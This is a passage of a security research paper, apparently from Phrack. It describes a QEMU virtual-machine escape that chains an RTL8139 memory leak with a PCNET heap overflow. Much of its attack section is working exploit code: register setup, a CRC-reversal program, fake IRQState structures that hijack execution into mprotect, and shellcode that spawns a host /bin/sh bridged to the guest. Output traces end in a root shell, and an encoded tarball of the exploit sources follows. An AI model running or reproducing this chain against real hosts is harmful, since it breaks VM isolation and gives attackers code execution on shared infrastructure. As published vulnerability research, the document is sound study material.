RTL8139_BUFFER_SIZE); phy_mem = (uint32)gva_to_gpa(rtl8139_tx_buffer); memset(&desc, 0, sizeof(struct rtl8139_desc)); desc->dw0 |= CP_TX_OWN | CP_TX_EOR | CP_TX_LS | CP_TX_LGSEN | CP_TX_IPCS | CP_TX_TCPCS; desc->dw0 += RTL8139_BUFFER_SIZE; desc.buf_lo = phy_mem; iopl(3); outl(TxLoopBack, RTL8139_PORT + TxConfig); outl(AcceptMyPhys, RTL8139_PORT + RxConfig); outw(CPlusRxEnb|CPlusTxEnb, RTL8139_PORT + CpCmd); outb(CmdRxEnb|CmdTxEnb, RTL8139_PORT + ChipCmd); outl(phy_mem, RTL8139_PORT + TxAddr0); outl(0x0, RTL8139_PORT + TxAddr0 + 0x4); ----[ 3.3 - Exploit The full exploit (cve-2015-5165.c) is available inside the attached source code tarball. The exploit configures the required registers on the card and sets up Tx and Rx buffer descriptors. Then it forges a malformed IP packet addressed to the MAC address of the card. This enables us to read the leaked data by accessing the configured Rx buffers. While analyzing the leaked data we have observed that several function pointers are present. A closer look reveals that these functions pointers are all members of a same QEMU internal structure: typedef struct ObjectProperty { gchar *name; gchar *type; gchar *description; ObjectPropertyAccessor *get; ObjectPropertyAccessor *set; ObjectPropertyResolve *resolve; ObjectPropertyRelease *release; void *opaque; QTAILQ_ENTRY(ObjectProperty) node; } ObjectProperty; QEMU follows an object model to manage devices, memory regions, etc. At startup, QEMU creates several objects and assigns to them properties. For example, the following call adds a "may-overlap" property to a memory region object. This property is endowed with a getter method to retrieve the value of this boolean property: object_property_add_bool(OBJECT(mr), "may-overlap", memory_region_get_may_overlap, NULL, /* memory_region_set_may_overlap */ &error_abort); The RTL8139 network card device emulator reserves a 64 KB on the heap to reassemble packets. There is a large chance that this allocated buffer fits on the space left free by destroyed object properties. In our exploit, we search for known object properties in the leaked memory. More precisely, we are looking for 80 bytes memory chunks (chunk size of a free'd ObjectProperty structure) where at least one of the function pointers is set (get, set, resolve or release). Even if these addresses are subject to ASLR, we can still guess the base address of the .text section. Indeed, their page offsets are fixed (12 least significant bits or virtual addresses are not randomized). We can do some arithmetics to get the address of some of QEMU's useful functions. We can also derive the address of some LibC functions such as mprotect() and system() from their PLT entries. We have also noticed that the address PHY_MEM + 0x78 is leaked several times, where PHY_MEM is the start address of the physical memory allocated for the guest. The current exploit searches the leaked memory and tries to resolves (i) the base address of the .text segment and (ii) the base address of the physical memory. --[ 4 - Heap-based Overflow Exploitation This section discusses the vulnerability CVE-2015-7504 and provides an exploit that gets control over the %rip register. ----[ 4.1 - The vulnerable Code The AMD PCNET network card emulator is vulnerable to a heap-based overflow when large-size packets are received in loopback test mode. The PCNET device emulator reserves a buffer of 4 kB to store packets. If the ADDFCS flag is enabled on Tx descriptor buffer, the card appends a CRC to received packets as shown in the following snippet of code in pcnet_receive() function from hw/net/pcnet.c. This does not pose a problem if the size of the received packets are less than 4096 - 4 bytes. However, if the packet has exactly 4096 bytes, then we can overflow the destination buffer with 4 bytes. uint8_t *src = s->buffer; /* ... */ if (!s->looptest) { memcpy(src, buf, size); /* no need to compute the CRC */ src[size] = 0; src[size + 1] = 0; src[size + 2] = 0; src[size + 3] = 0; size += 4; } else if (s->looptest == PCNET_LOOPTEST_CRC || !CSR_DXMTFCS(s) || size < MIN_BUF_SIZE+4) { uint32_t fcs = ~0; uint8_t *p = src; while (p != &src[size]) CRC(fcs, *p++); *(uint32_t *)p = htonl(fcs); size += 4; } In the above code, s points to PCNET main structure, where we can see that beyond our vulnerable buffer, we can corrupt the value of the irq variable: struct PCNetState_st { NICState *nic; NICConf conf; QEMUTimer *poll_timer; int rap, isr, lnkst; uint32_t rdra, tdra; uint8_t prom[16]; uint16_t csr[128]; uint16_t bcr[32]; int xmit_pos; uint64_t timer; MemoryRegion mmio; uint8_t buffer[4096]; qemu_irq irq; void (*phys_mem_read)(void *dma_opaque, hwaddr addr, uint8_t *buf, int len, int do_bswap); void (*phys_mem_write)(void *dma_opaque, hwaddr addr, uint8_t *buf, int len, int do_bswap); void *dma_opaque; int tx_busy; int looptest; }; The variable irq is a pointer to IRQState structure that represents a handler to execute: typedef void (*qemu_irq_handler)(void *opaque, int n, int level); struct IRQState { Object parent_obj; qemu_irq_handler handler; void *opaque; int n; }; This handler is called several times by the PCNET card emulator. For instance, at the end of pcnet_receive() function, there is call a to pcnet_update_irq() which in turn calls qemu_set_irq(): void qemu_set_irq(qemu_irq irq, int level) { if (!irq) return; irq->handler(irq->opaque, irq->n, level); } So, what we need to exploit this vulnerability: - allocate a fake IRQState structure with a handler to execute (e.g. system()). - compute the precise address of this allocated fake structure. Thanks to the previous memory leak, we know exactly where our fake structure resides in QEMU's process memory (at some offset from the base address of the guest's physical memory). - forge a 4 kB malicious packets. - patch the packet so that the computed CRC on that packet matches the address of our fake IRQState structure. - send the packet. When this packet is received by the PCNET card, it is handled by the pcnet_receive function() that performs the following actions: - copies the content of the received packet into the buffer variable. - computes a CRC and appends it to the buffer. The buffer is overflowed with 4 bytes and the value of irq variable is corrupted. - calls pcnet_update_irq() that in turns calls qemu_set_irq() with the corrupted irq variable. Out handler is then executed. Note that we can get control over the first two parameters of the substituted handler (irq->opaque and irq->n), but thanks to a little trick that we will see later, we can get control over the third parameter too (level parameter). This will be necessary to call mprotect() function. Note also that we corrupt an 8-byte pointer with 4 bytes. This is sufficient in our testing environment to successfully get control over the %rip register. However, this poses a problem with kernels compiled without the CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. This issue is discussed in section 5.4. ----[ 4.2 - Setting up the Card Before going further, we need to set up the PCNET card in order to configure the required flags, set up Tx and Rx descriptor buffers and allocate ring buffers to hold packets to transmit and receive. The AMD PCNET card could be accessed in 16 bits mode or 32 bits mode. This depends on the current value of DWI0 (value stored in the card). In the following, we detail the main registers of the PCNET card in 16 bits access mode as this is the default mode after a card reset: 0 16 +----------------------------------+ | EPROM | +----------------------------------+ | RDP - Data reg for CSR | +----------------------------------+ | RAP - Index reg for CSR and BCR | +----------------------------------+ | Reset reg | +----------------------------------+ | BDP - Data reg for BCR | +----------------------------------+ The card can be reset to default by accessing the reset register. The card has two types of internal registers: CSR (Control and Status Register) and BCR (Bus Control Registers). Both registers are accessed by setting first the index of the register that we want to access in the RAP (Register Address Port) register. For instance, if we want to init and restart the card, we need to set bit0 and bit1 to 1 of register CSR0. This can be done by writing 0 to RAP register in order to select the register CSR0, then by setting register CSR to 0x3: outw(0x0, PCNET_PORT + RAP); outw(0x3, PCNET_PORT + RDP); The configuration of the card could be done by filling an initialization structure and passing the physical address of this structure to the card (through register CSR1 and CSR2): struct pcnet_config { uint16_t mode; /* working mode: promiscusous, looptest, etc. */ uint8_t rlen; /* number of rx descriptors in log2 base */ uint8_t tlen; /* number of tx descriptors in log2 base */ uint8_t mac[6]; /* mac address */ uint16_t _reserved; uint8_t ladr[8]; /* logical address filter */ uint32_t rx_desc; /* physical address of rx descriptor buffer */ uint32_t tx_desc; /* physical address of tx descriptor buffer */ }; ----[ 4.3 - Reversing CRC As discussed previously, we need to fill a packet with data in such a way that the computed CRC matches the address of our fake structure. Fortunately, the CRC is reversible. Thanks to the ideas exposed in [6], we can apply a 4-byte patch to our packet so that the computed CRC matches a value of our choice. The source code reverse-crc.c applies a patch to a pre-filled buffer so that the computed CRC is equal to 0xdeadbeef. ---[ reverse-crc.c ]--- #include <stdio.h> #include <stdint.h> #define CRC(crc, ch) (crc = (crc >> 8) ^ crctab[(crc ^ (ch)) & 0xff]) /* generated using the AUTODIN II polynomial * x^32 + x^26 + x^23 + x^22 + x^16 + * x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + x^1 + 1 */ static const uint32_t crctab[256] = { 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d, }; uint32_t crc_compute(uint8_t *buffer, size_t size) { uint32_t fcs = ~0; uint8_t *p = buffer; while (p != &buffer[size]) CRC(fcs, *p++); return fcs; } uint32_t crc_reverse(uint32_t current, uint32_t target) { size_t i = 0, j; uint8_t *ptr; uint32_t workspace[2] = { current, target }; for (i = 0; i < 2; i++) workspace[i] &= (uint32_t)~0; ptr = (uint8_t *)(workspace + 1); for (i = 0; i < 4; i++) { j = 0; while(crctab[j] >> 24 != *(ptr + 3 - i)) j++; *((uint32_t *)(ptr - i)) ^= crctab[j]; *(ptr - i - 1) ^= j; } return *(uint32_t *)(ptr - 4); } int main() { uint32_t fcs; uint32_t buffer[2] = { 0xcafecafe }; uint8_t *ptr = (uint8_t *)buffer; fcs = crc_compute(ptr, 4); printf("[+] current crc = %010p, required crc = \n", fcs); fcs = crc_reverse(fcs, 0xdeadbeef); printf("[+] applying patch = %010p\n", fcs); buffer[1] = fcs; fcs = crc_compute(ptr, 8); if (fcs == 0xdeadbeef) printf("[+] crc patched successfully\n"); } ----[ 4.4 - Exploit The exploit (file cve-2015-7504.c from the attached source code tarball) resets the card to its default settings, then configures Tx and Rx descriptors and sets the required flags, and finally inits and restarts the card to push our network card config. The rest of the exploit simply triggers the vulnerability that crashes QEMU with a single packet. As shown below, qemu_set_irq is called with a corrupted irq variable pointing to 0x7f66deadbeef. QEMU crashes as there is no runnable handler at this address. (gdb) shell ps -e | grep qemu 8335 pts/4 00:00:03 qemu-system-x86 (gdb) attach 8335 ... (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00007f669ce6c363 in qemu_set_irq (irq=0x7f66deadbeef, level=0) 43 irq->handler(irq->opaque, irq->n, level); --[ 5 - Putting all Together In this section, we merge the two previous exploits in order to escape from the VM and get code execution on the host with QEMU's privileges. First, we exploit CVE-2015-5165 in order to reconstruct the memory layout of QEMU. More precisely, the exploit tries to resolve the following addresses in order to bypass ASLR: - The guest physical memory base address. In our exploit, we need to do some allocations on the guest and get their precise address within the virtual address space of QEMU. - The .text section base address. This serves to get the address of qemu_set_irq() function. - The .plt section base address. This serves to determine the addresses of some functions such as fork() and execv() used to build our shellcode. The address of mprotect() is also needed to change the permissions of the guest physical address. Remember that the physical address allocated for the guest is not executable. ----[ 5.1 - RIP Control As shown in section 4 we have control over %rip register. Instead of letting QEMU crash at arbitrary address, we overflow the PCNET buffer with an address pointing to a fake IRQState that calls a function of our choice. At first sight, one could be attempted to build a fake IRQState that runs system(). However, this call will fail as some of QEMU memory mappings are not preserved across a fork() call. More precisely, the mmapped physical memory is marked with the MADV_DONTFORK flag: qemu_madvise(new_block->host, new_block->max_length, QEMU_MADV_DONTFORK); Calling execv() is not useful too as we lose our hands on the guest machine. Note also that one can construct a shellcode by chaining several fake IRQState in order to call multiple functions since qemu_set_irq() is called several times by PCNET device emulator. However, we found that it's more convenient and more reliable to execute a shellcode after having enabled the PROT_EXEC flag of the page memory where the shellcode is located. Our idea, is to build two fake IRQState structures. The first one is used to make a call to mprotect(). The second one is used to call a shellcode that will undo first the MADV_DONTFORK flag and then runs an interactive shell between the guest and the host. As stated earlier, when qemu_set_irq() is called, it takes two parameters as input: irq (pointer to IRQstate structure) and level (IRQ level), then calls the handler as following: void qemu_set_irq(qemu_irq irq, int level) { if (!irq) return; irq->handler(irq->opaque, irq->n, level); } As shown above, we have control only over the first two parameters. So how to call mprotect() that has three arguments? To overcome this, we will make qemu_set_irq() calls itself first with the following parameters: - irq: pointer to a fake IRQState that sets the handler pointer to mprotect() function. - level: mprotect flags set to PROT_READ | PROT_WRITE | PROT_EXEC This is achieved by setting two fake IRQState as shown by the following snippet code: struct IRQState { uint8_t _nothing[44]; uint64_t handler; uint64_t arg_1; int32_t arg_2; }; struct IRQState fake_irq[2]; hptr_t fake_irq_mem = gva_to_hva(fake_irq); /* do qemu_set_irq */ fake_irq[0].handler = qemu_set_irq_addr; fake_irq[0].arg_1 = fake_irq_mem + sizeof(struct IRQState); fake_irq[0].arg_2 = PROT_READ | PROT_WRITE | PROT_EXEC; /* do mprotect */ fake_irq[1].handler = mprotec_addrt; fake_irq[1].arg_1 = (fake_irq_mem >> PAGE_SHIFT) << PAGE_SHIFT; fake_irq[1].arg_2 = PAGE_SIZE; After overflow takes place, qemu_set_irq() is called with a fake handler that simply recalls qemu_set_irq() which in turns calls mprotect after having adjusted the level parameter to 7 (required flag for mprotect). The memory is now executable, we can pass the control to our interactive shell by rewriting the handler of the first IRQState to the address of our shellcode: payload.fake_irq[0].handler = shellcode_addr; payload.fake_irq[0].arg_1 = shellcode_data; ----[ 5.2 - Interactive Shell Well. We can simply write a basic shellcode that binds a shell to netcat on some port and then connect to that shell from a separate machine. That's a satisfactory solution, but we can do better to avoid firewall restrictions. We can leverage on a shared memory between the guest and the host to build a bindshell. Exploiting QEMU's vulnerabilities is a little bit subtle as the code we are writing in the guest is already available in the QEMU's process memory. So there is no need to inject a shellcode. Even better, we can share code and make it run on the guest and the attacked host. The following figure summarizes the shared memory and the process/thread running on the host and the guest. We create two shared ring buffers (in and out) and provide read/write primitives with spin-lock access to those shared memory areas. On the host machine, we run a shellcode that starts a /bin/sh shell on a separate process after having duplicated first its stdin and stdout file descriptors. We create also two threads. The first one reads commands from the shared memory and passes them to the shell via a pipe. The second threads reads the output of the shell (from a second pipe) and then writes them to the shared memory. These two threads are also instantiated on the guest machine to write user input commands on the dedicated shared memory and to output the results read from the second ring buffer to stdout, respectively. Note that in our exploit, we have a third thread (and a dedicated shared area) to handle stderr output. GUEST SHARED MEMORY HOST ----- ------------- ---- +------------+ +------------+ | exploit | | QEMU | | (thread) | | (main) | +------------+ +------------+ +------------+ +------------+ | exploit | sm_write() head sm_read() | QEMU | | (thread) |----------+ |--------------| (thread) | +------------+ | V +---------++-+ | xxxxxxxxxxxxxx----+ pipe IN || | x | +---------++-+ | x ring buffer | | shell | tail ------>x (filled with x) ^ | fork proc. | | | +---------++-+ +-------->--------+ pipe OUT || +------------+ +---------++-+ | exploit | sm_read() tail sm_write() | QEMU | | (thread) |----------+ |--------------| (thread) | +------------+ | V +------------+ | xxxxxxxxxxxxxx----+ | x | | x ring buffer | head ------>x (filled with x) ^ | | +-------->--------+ ----[ 5.3 - VM-Escape Exploit In the section, we outline the main structures and functions used in the full exploit (vm-escape.c). The injected payload is defined by the following structure: struct payload { struct IRQState fake_irq[2]; struct shared_data shared_data; uint8_t shellcode[1024]; uint8_t pipe_fd2r[1024]; uint8_t pipe_r2fd[1024]; }; Where fake_irq is a pair of fake IRQState structures responsible to call mprotect() and change the page protection where the payload resides. The structure shared_data is used to pass arguments to the main shellcode: struct shared_data { struct GOT got; uint8_t shell[64]; hptr_t addr; struct shared_io shared_io; volatile int done; }; Where the got structure acts as a Global Offset Table. It contains the address of the main functions to run by the shellcode. The addresses of these functions are resolved from the memory leak. struct GOT { typeof(open) *open; typeof(close) *close; typeof(read) *read; typeof(write) *write; typeof(dup2) *dup2; typeof(pipe) *pipe; typeof(fork) *fork; typeof(execv) *execv; typeof(malloc) *malloc; typeof(madvise) *madvise; typeof(pthread_create) *pthread_create; typeof(pipe_r2fd) *pipe_r2fd; typeof(pipe_fd2r) *pipe_fd2r; }; The main shellcode is defined by the following function: /* main code to run after %rip control */ void shellcode(struct shared_data *shared_data) { pthread_t t_in, t_out, t_err; int in_fds[2], out_fds[2], err_fds[2]; struct brwpipe *in, *out, *err; char *args[2] = { shared_data->shell, NULL }; if (shared_data->done) { return; } shared_data->got.madvise((uint64_t *)shared_data->addr, PHY_RAM, MADV_DOFORK); shared_data->got.pipe(in_fds); shared_data->got.pipe(out_fds); shared_data->got.pipe(err_fds); in = shared_data->got.malloc(sizeof(struct brwpipe)); out = shared_data->got.malloc(sizeof(struct brwpipe)); err = shared_data->got.malloc(sizeof(struct brwpipe)); in->got = &shared_data->got; out->got = &shared_data->got; err->got = &shared_data->got; in->fd = in_fds[1]; out->fd = out_fds[0]; err->fd = err_fds[0]; in->ring = &shared_data->shared_io.in; out->ring = &shared_data->shared_io.out; err->ring = &shared_data->shared_io.err; if (shared_data->got.fork() == 0) { shared_data->got.close(in_fds[1]); shared_data->got.close(out_fds[0]); shared_data->got.close(err_fds[0]); shared_data->got.dup2(in_fds[0], 0); shared_data->got.dup2(out_fds[1], 1); shared_data->got.dup2(err_fds[1], 2); shared_data->got.execv(shared_data->shell, args); } else { shared_data->got.close(in_fds[0]); shared_data->got.close(out_fds[1]); shared_data->got.close(err_fds[1]); shared_data->got.pthread_create(&t_in, NULL, shared_data->got.pipe_r2fd, in); shared_data->got.pthread_create(&t_out, NULL, shared_data->got.pipe_fd2r, out); shared_data->got.pthread_create(&t_err, NULL, shared_data->got.pipe_fd2r, err); shared_data->done = 1; } } The shellcode checks first the flag shared_data->done to avoid running the shellcode multiple times (remember that qemu_set_irq used to pass control to the shellcode is called several times by QEMU code). The shellcode calls madvise() with shared_data->addr pointing to the physical memory. This is necessary to undo the MADV_DONTFORK flag and hence preserve memory mappings across fork() calls. The shellcode creates a child process that is responsible to start a shell ("/bin/sh"). The parent process starts threads that make use of shared memory areas to pass shell commands from the guest to the attacked host and then write back the results of these commands to the guest machine. The communication between the parent and the child process is carried by pipes. As shown below, a shared memory area consists of a ring buffer that is accessed by sm_read() and sm_write() primitives: struct shared_ring_buf { volatile bool lock; bool empty; uint8_t head; uint8_t tail; uint8_t buf[SHARED_BUFFER_SIZE]; }; static inline __attribute__((always_inline)) ssize_t sm_read(struct GOT *got, struct shared_ring_buf *ring, char *out, ssize_t len) { ssize_t read = 0, available = 0; do { /* spin lock */ while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED)); if (ring->head > ring->tail) { // loop on ring available = SHARED_BUFFER_SIZE - ring->head; } else { available = ring->tail - ring->head; if (available == 0 && !ring->empty) { available = SHARED_BUFFER_SIZE - ring->head; } } available = MIN(len - read, available); imemcpy(out, ring->buf + ring->head, available); read += available; out += available; ring->head += available; if (ring->head == SHARED_BUFFER_SIZE) ring->head = 0; if (available != 0 && ring->head == ring->tail) ring->empty = true; __atomic_clear(&ring->lock, __ATOMIC_RELAXED); } while (available != 0 || read == 0); return read; } static inline __attribute__((always_inline)) ssize_t sm_write(struct GOT *got, struct shared_ring_buf *ring, char *in, ssize_t len) { ssize_t written = 0, available = 0; do { /* spin lock */ while (__atomic_test_and_set(&ring->lock, __ATOMIC_RELAXED)); if (ring->tail > ring->head) { // loop on ring available = SHARED_BUFFER_SIZE - ring->tail; } else { available = ring->head - ring->tail; if (available == 0 && ring->empty) { available = SHARED_BUFFER_SIZE - ring->tail; } } available = MIN(len - written, available); imemcpy(ring->buf + ring->tail, in, available); written += available; in += available; ring->tail += available; if (ring->tail == SHARED_BUFFER_SIZE) ring->tail = 0; if (available != 0) ring->empty = false; __atomic_clear(&ring->lock, __ATOMIC_RELAXED); } while (written != len); return written; } These primitives are used by the following threads function. The first one reads data from a shared memory area and writes it to a file descriptor. The second one reads data from a file descriptor and writes it to a shared memory area. void *pipe_r2fd(void *_brwpipe) { struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe; char buf[SHARED_BUFFER_SIZE]; ssize_t len; while (true) { len = sm_read(brwpipe->got, brwpipe->ring, buf, sizeof(buf)); if (len > 0) brwpipe->got->write(brwpipe->fd, buf, len); } return NULL; } SHELLCODE(pipe_r2fd) void *pipe_fd2r(void *_brwpipe) { struct brwpipe *brwpipe = (struct brwpipe *)_brwpipe; char buf[SHARED_BUFFER_SIZE]; ssize_t len; while (true) { len = brwpipe->got->read(brwpipe->fd, buf, sizeof(buf)); if (len < 0) { return NULL; } else if (len > 0) { len = sm_write(brwpipe->got, brwpipe->ring, buf, len); } } return NULL; } Note that the code of these functions are shared between the host and the guest. These threads are also instantiated in the guest machine to read user input commands and copy them on the dedicated shared memory area (in memory), and to write back the output of these commands available in the corresponding shared memory areas (out and err shared memories): void session(struct shared_io *shared_io) { size_t len; pthread_t t_in, t_out, t_err; struct GOT got; struct brwpipe *in, *out, *err; got.read = &read; got.write = &write; warnx("[!] enjoy your shell"); fputs(COLOR_SHELL, stderr); in = malloc(sizeof(struct brwpipe)); out = malloc(sizeof(struct brwpipe)); err = malloc(sizeof(struct brwpipe)); in->got = &got; out->got = &got; err->got = &got; in->fd = STDIN_FILENO; out->fd = STDOUT_FILENO; err->fd = STDERR_FILENO; in->ring = &shared_io->in; out->ring = &shared_io->out; err->ring = &shared_io->err; pthread_create(&t_in, NULL, pipe_fd2r, in); pthread_create(&t_out, NULL, pipe_r2fd, out); pthread_create(&t_err, NULL, pipe_r2fd, err); pthread_join(t_in, NULL); pthread_join(t_out, NULL); pthread_join(t_err, NULL); } The figure presented in the previous section illustrates the shared memories and the processes/threads started in the guest and the host machines. The exploit targets a vulnerable version of QEMU built using version 4.9.2 of Gcc. In order to adapt the exploit to a specific QEMU build, we provide a shell script (build-exploit.sh) that will output a C header with the required offsets: $ ./build-exploit <path-to-qemu-binary> > qemu.h Running the full exploit (vm-escape.c) will result in the following output: $ ./vm-escape $ exploit: [+] found 190 potential ObjectProperty structs in memory $ exploit: [+] .text mapped at 0x7fb6c55c3620 $ exploit: [+] mprotect mapped at 0x7fb6c55c0f10 $ exploit: [+] qemu_set_irq mapped at 0x7fb6c5795347 $ exploit: [+] VM physical memory mapped at 0x7fb630000000 $ exploit: [+] payload at 0x7fb6a8913000 $ exploit: [+] patching packet ... $ exploit: [+] running first attack stage $ exploit: [+] running shellcode at 0x7fb6a89132d0 $ exploit: [!] enjoy your shell $ shell > id $ uid=0(root) gid=0(root) ... ----[ 5.4 - Limitations Please note that the current exploit is still somehow unreliable. In our testing environment (Debian 7 running a 3.16 kernel on x_86_64 arch), we have observed a failure rate of approximately 1 in 10 runnings. In most unsuccessful attempts, the exploit fails to reconstruct the memory layout of QEMU due to unusable leaked data. The exploit does not work on linux kernels compiled without the CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. In this case QEMU binary (compiled by default with -fPIE) is mapped into a separate address space as shown by the following listing: 55e5e3fdd000-55e5e4594000 r-xp 00000000 fe:01 6940407 [qemu-system-x86_64] 55e5e4794000-55e5e4862000 r--p 005b7000 fe:01 6940407 ... 55e5e4862000-55e5e48e3000 rw-p 00685000 fe:01 6940407 ... 55e5e48e3000-55e5e4d71000 rw-p 00000000 00:00 0 55e5e6156000-55e5e7931000 rw-p 00000000 00:00 0 [heap] 7fb80b4f5000-7fb80c000000 rw-p 00000000 00:00 0 7fb80c000000-7fb88c000000 rw-p 00000000 00:00 0 [2 GB of RAM] 7fb88c000000-7fb88c915000 rw-p 00000000 00:00 0 ... 7fb89b6a0000-7fb89b6cb000 r-xp 00000000 fe:01 794385 [first shared lib] 7fb89b6cb000-7fb89b8cb000 ---p 0002b000 fe:01 794385 ... 7fb89b8cb000-7fb89b8cc000 r--p 0002b000 fe:01 794385 ... 7fb89b8cc000-7fb89b8cd000 rw-p 0002c000 fe:01 794385 ... ... 7ffd8f8f8000-7ffd8f91a000 rw-p 00000000 00:00 0 [stack] 7ffd8f970000-7ffd8f972000 r--p 00000000 00:00 0 [vvar] 7ffd8f972000-7ffd8f974000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall] As a consequence, our 4-byte overflow is not sufficient to dereference the irq pointer (originally located in the heap somewhere at 0x55xxxxxxxxxx) so that it points to our fake IRQState structure (injected somewhere at 0x7fxxxxxxxxxx). --[ 6 - Conclusions In this paper, we have presented two exploits on QEMU's network device emulators. The combination of these exploits make it possible to break out from a VM and execute code on the host. During this work, we have probably crashed our testing VM more that one thousand times. It was tedious to debug unsuccessful exploit attempts, especially, with a complex shellcode that spawns several threads an processes. So, we hope, that we have provided sufficient technical details and generic techniques that could be reused for further exploitation on QEMU. --[ 7 - Greets We would like to thank Pierre-Sylvain Desse for his insightful comments. Greets to coldshell, and Kevin Schouteeten for helping us to test on various environments. Thanks also to Nelson Elhage for his seminal work on VM-escape. And a big thank to the reviewers of the Phrack Staff for challenging us to improve the paper and the code. --[ 8 - References [1] http://venom.crowdstrike.com [2] media.blackhat.com/bh-us-11/Elhage/BH_US_11_Elhage_Virtunoid_WP.pdf [3] https://github.com/nelhage/virtunoid/blob/master/virtunoid.c [4] http://lettieri.iet.unipi.it/virtualization/2014/Vtx.pdf [5] https://www.kernel.org/doc/Documentation/vm/pagemap.txt [6] https://blog.affien.com/archives/2005/07/15/reversing-crc/ --[ 9 - Source Code begin 644 vm_escape.tar.gz M'XL(`"[OTU@``^Q:Z7,:29;W5_%7Y*AC.L"-I<RJK*RJMML3"$H6801:0#ZV M#R)/B6BN@<(M;4_OW[XO7R*!D+KMV)C>C8V=^B"*S'?^WI$OL3]-1W:EY<(> M/_O3'@I/FB3^DZ4)W?V\>YZQF`J>BC3FXAEE4<RC9R3Y\TS:/NM5*9>$/)N6 M<J+&OT_WN?W_H\^G^_A/I^LC_:?H\`$6G/]>_".:I#[^,=!`!C"(?PS?GA'Z MIUBS]_P_C_]7XYF>K(TEKU:E&<^/KE]7=I>6X]G5_IH9S\I':Y.Q>KCF]*R< 